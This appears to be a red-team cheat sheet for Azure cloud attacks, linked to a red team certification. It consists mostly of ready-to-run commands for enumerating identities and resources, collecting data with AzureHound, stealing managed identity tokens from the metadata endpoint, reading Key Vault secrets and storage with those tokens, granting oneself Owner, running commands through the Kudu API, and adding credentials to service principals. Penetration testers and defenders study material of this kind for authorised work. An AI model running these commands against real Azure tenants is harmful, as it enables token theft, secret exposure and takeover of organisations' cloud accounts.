Certified Azure Red Team Professional

Azure Enumeration Commands

# Identity and permissions
az account show; az account list
az ad signed-in-user show
az role assignment list --assignee  --all

# Users, groups, apps
az ad user list --output table
az ad group list --output table
az ad app list --output table
az ad sp list --output table

# Resources
az resource list --output table
az keyvault list --output table
az storage account list --output table
az webapp list --output table
az functionapp list --output table

# AzureHound collection
azurehound list -t  -u [email protected] -p pass -o output.json
# Import to BloodHound for attack path analysis

Managed Identity Token Theft

# From inside Azure VM/Function/App with MI enabled
# IMDSv1 endpoint (Azure)
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -H 'Metadata: true'

# Use access_token for Azure API calls
TOKEN="eyJ..."
curl -H "Authorization: Bearer $TOKEN" https://management.azure.com/subscriptions//resources?api-version=2021-04-01

# Key Vault access with MI token
curl -H "Authorization: Bearer $TOKEN" https://.vault.azure.net/secrets?api-version=7.3

# Storage account access
curl -H "Authorization: Bearer $TOKEN" 'https://.blob.core.windows.net/?comp=list'

Azure IAM Privilege Escalation

# Check what permissions you have
az role assignment list --assignee $(az ad signed-in-user show --query id -o tsv) --all

# If you have Owner/UserAccessAdministrator:
# Add yourself as subscription Owner
az role assignment create --assignee  --role Owner --scope /subscriptions/

# If you have Contributor on App Service:
# Deploy reverse shell via Kudu API
curl -X POST "https://.scm.azurewebsites.net/api/command" \
  -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
  -d '{"command":"id","dir":"/"}'

# Add credentials to Service Principal (if you have Application.ReadWrite.All)
az ad app credential reset --id  --append